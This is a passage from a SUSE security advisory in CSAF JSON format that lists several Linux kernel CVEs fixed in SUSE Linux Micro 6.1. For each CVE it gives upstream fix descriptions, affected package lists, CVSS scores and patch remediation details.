"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68728"
},
{
"cve": "CVE-2025-68732",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68732"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpu: host1x: Fix race in syncpt alloc/free\n\nFix race condition between host1x_syncpt_alloc()\nand host1x_syncpt_put() by using kref_put_mutex()\ninstead of kref_put() + manual mutex locking.\n\nThis ensures no thread can acquire the\nsyncpt_mutex after the refcount drops to zero\nbut before syncpt_release acquires it.\nThis prevents races where syncpoints could\nbe allocated while still being cleaned up\nfrom a previous release.\n\nRemove explicit mutex locking in syncpt_release\nas kref_put_mutex() handles this atomically.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68732",
"url": "https://www.suse.com/security/cve/CVE-2025-68732"
},
{
"category": "external",
"summary": "SUSE Bug 1255688 for CVE-2025-68732",
"url": "https://bugzilla.suse.com/1255688"
},
{
"category": "external",
"summary": "SUSE Bug 1255689 for CVE-2025-68732",
"url": "https://bugzilla.suse.com/1255689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-68732"
},
{
"cve": "CVE-2025-68733",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68733"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmack: fix bug: unprivileged task can create labels\n\nIf an unprivileged task is allowed to relabel itself\n(/smack/relabel-self is not empty),\nit can freely create new labels by writing their\nnames into own /proc/PID/attr/smack/current\n\nThis occurs because do_setattr() imports\nthe provided label in advance,\nbefore checking \"relabel-self\" list.\n\nThis change ensures that the \"relabel-self\" list\nis checked before importing the label.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68733",
"url": "https://www.suse.com/security/cve/CVE-2025-68733"
},
{
"category": "external",
"summary": "SUSE Bug 1255615 for CVE-2025-68733",
"url": "https://bugzilla.suse.com/1255615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68733"
},
{
"cve": "CVE-2025-68734",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68734"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nisdn: mISDN: hfcsusb: fix memory leak in hfcsusb_probe()\n\nIn hfcsusb_probe(), the memory allocated for ctrl_urb gets leaked when\nsetup_instance() fails with an error code. Fix that by freeing the urb\nbefore freeing the hw structure. Also change the error paths to use the\ngoto ladder style.\n\nCompile tested only. Issue found using a prototype static analysis tool.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68734",
"url": "https://www.suse.com/security/cve/CVE-2025-68734"
},
{
"category": "external",
"summary": "SUSE Bug 1255538 for CVE-2025-68734",
"url": "https://bugzilla.suse.com/1255538"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68734"
},
{
"cve": "CVE-2025-68740",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68740"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nima: Handle error code returned by ima_filter_rule_match()\n\nIn ima_match_rules(), if ima_filter_rule_match() returns -ENOENT due to\nthe rule being NULL, the function incorrectly skips the \u0027if (!rc)\u0027 check\nand sets \u0027result = true\u0027. The LSM rule is considered a match, causing\nextra files to be measured by IMA.\n\nThis issue can be reproduced in the following scenario:\nAfter unloading the SELinux policy module via \u0027semodule -d\u0027, if an IMA\nmeasurement is triggered before ima_lsm_rules is updated,\nin ima_match_rules(), the first call to ima_filter_rule_match() returns\n-ESTALE. This causes the code to enter the \u0027if (rc == -ESTALE \u0026\u0026\n!rule_reinitialized)\u0027 block, perform ima_lsm_copy_rule() and retry. In\nima_lsm_copy_rule(), since the SELinux module has been removed, the rule\nbecomes NULL, and the second call to ima_filter_rule_match() returns\n-ENOENT. This bypasses the \u0027if (!rc)\u0027 check and results in a false match.\n\nCall trace:\n selinux_audit_rule_match+0x310/0x3b8\n security_audit_rule_match+0x60/0xa0\n ima_match_rules+0x2e4/0x4a0\n ima_match_policy+0x9c/0x1e8\n ima_get_action+0x48/0x60\n process_measurement+0xf8/0xa98\n ima_bprm_check+0x98/0xd8\n security_bprm_check+0x5c/0x78\n search_binary_handler+0x6c/0x318\n exec_binprm+0x58/0x1b8\n bprm_execve+0xb8/0x130\n do_execveat_common.isra.0+0x1a8/0x258\n __arm64_sys_execve+0x48/0x68\n invoke_syscall+0x50/0x128\n el0_svc_common.constprop.0+0xc8/0xf0\n do_el0_svc+0x24/0x38\n el0_svc+0x44/0x200\n el0t_64_sync_handler+0x100/0x130\n el0t_64_sync+0x3c8/0x3d0\n\nFix this by changing \u0027if (!rc)\u0027 to \u0027if (rc \u003c= 0)\u0027 to ensure that error\ncodes like -ENOENT do not bypass the check and accidentally result in a\nsuccessful match.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68740",
"url": "https://www.suse.com/security/cve/CVE-2025-68740"
},
{
"category": "external",
"summary": "SUSE Bug 1255812 for CVE-2025-68740",
"url": "https://bugzilla.suse.com/1255812"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68740"
},
{
"cve": "CVE-2025-68742",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68742"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix invalid prog-\u003estats access when update_effective_progs fails\n\nSyzkaller triggers an invalid memory access issue following fault\ninjection in update_effective_progs. The issue can be described as\nfollows:\n\n__cgroup_bpf_detach\n update_effective_progs\n compute_effective_progs\n bpf_prog_array_alloc \u003c-- fault inject\n purge_effective_progs\n /* change to dummy_bpf_prog */\n array-\u003eitems[index] = \u0026dummy_bpf_prog.prog\n\n---softirq start---\n__do_softirq\n ...\n __cgroup_bpf_run_filter_skb\n __bpf_prog_run_save_cb\n bpf_prog_run\n stats = this_cpu_ptr(prog-\u003estats)\n /* invalid memory access */\n flags = u64_stats_update_begin_irqsave(\u0026stats-\u003esyncp)\n---softirq end---\n\n static_branch_dec(\u0026cgroup_bpf_enabled_key[atype])\n\nThe reason is that fault injection caused update_effective_progs to fail\nand then changed the original prog into dummy_bpf_prog.prog in\npurge_effective_progs. Then a softirq came, and accessing the members of\ndummy_bpf_prog.prog in the softirq triggers invalid mem access.\n\nTo fix it, skip updating stats when stats is NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68742",
"url": "https://www.suse.com/security/cve/CVE-2025-68742"
},
{
"category": "external",
"summary": "SUSE Bug 1255707 for CVE-2025-68742",
"url": "https://bugzilla.suse.com/1255707"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
